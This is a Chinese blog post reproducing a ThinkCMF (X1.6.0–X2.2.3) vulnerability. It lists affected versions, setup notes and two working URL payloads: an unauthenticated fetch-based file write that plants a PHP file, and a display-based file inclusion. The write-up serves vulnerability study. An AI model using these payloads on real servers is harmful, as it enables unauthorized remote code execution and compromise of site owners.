zoukankan      html  css  js  c++  java
  • ThinkCMF框架任意内容包含漏洞复现

    1. 漏洞概述

    ThinkCMF是一款基于PHP+MYSQL开发的中文内容管理框架,底层采用ThinkPHP3.2.3构建。

    利用此漏洞无需任何权限情况下,构造恶意的url,可以向服务器写入任意内容的文件,实现远程代码执行

    2.影响范围

    1     ThinkCMF X1.6.0
    2     ThinkCMF X2.1.0
    3     ThinkCMF X2.2.0
    4     ThinkCMF X2.2.1
    5     ThinkCMF X2.2.2
    6     ThinkCMF X2.2.3

    3.复现

    环境搭建

    我用的是phpstudy搭建ThinkCMF X2.2.3 

    要用nginx,不然提示没有权限

    根据安装向导安装即可

    4.漏洞利用

    方法一:

    通过构造a参数的fetch方法,可以不需要知道文件路径就可以把php代码写入文件

    phpinfo版payload如下:

    1 ?a=fetch&templateFile=public/index&prefix=''&content=<php>file_put_contents('test.php','<?php phpinfo(); ?>')</php>

    利用结果

    访问写入的文件

    第二种

    通过构造a参数的display方法,实现任意内容包含漏洞

    payload:

    1 ?a=display&templateFile=README.md

    参考文章:

    https://www.freebuf.com/vuls/217586.html

  • 相关阅读:
    Ext.form.FieldSet字段集
    jQuery系列目录
    Ext.form.field.Trigger触发字段
    Ext.grid.Panel表格分页
    ExtJS Model数据实体模型
    Ext.form.field.Spinner微调字段
    Ext.window.MessageBox
    书单
    资料收集
    喧嚣
  • 原文地址:https://www.cnblogs.com/lanyincao/p/11844537.html
Copyright © 2011-2022 走看看